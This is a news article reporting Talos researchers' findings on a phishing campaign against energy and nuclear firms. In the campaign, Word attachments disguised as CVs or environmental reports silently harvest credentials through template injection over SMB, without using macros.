Phishing emails, used to steal credentials from critical infrastructure firms, can silently harvest data without even using macros, researchers have warned.
Hackers are targeting energy companies, including those working in nuclear power and other critical infrastructures providers, with a technique that puts a new spin on a tried-and-tested form of cyberattack.
Phishing has long been a successful method of attack, with cybercriminals crafting a legitimate-looking email and sending it to the intended victim along with a malicious attachment. Once executed, it runs code for dropping malware, which can be used for ransomware, stealing data, or another form of attack.
But now attackers can run phishing campaigns without malicious code embedded in an attachment, instead downloading a template file injection over an SMB connection to silently harvest credentials, according to researchers at Talos Intelligence.
While the attack method is currently only used to steal data, researchers warn it could be employed to drop other malware.
It’s the latest in a string of attacks which have exploited SMB flaws — although, unlike Petya or WannaCry, there’s no known relation between this and EternalBlue, the leaked NSA windows exploit which has been used to carry out global ransomware attacks.
Cyberattacks against critical infrastructure are not a new phenomenon, and since May 2017 hackers have been using this new technique to target energy companies around the world, predominately in Europe and the US, with the goal of stealing the credentials of those working in critical infrastructure. It’s not yet known who is behind the attacks or where they’re based.
Like other phishing campaigns, this attack uses emails relevant to the targets as a lure. In this instance, the emails often claim to be environmental reports or a CV, and come with an attached Word document that attempts to harvest data when opened.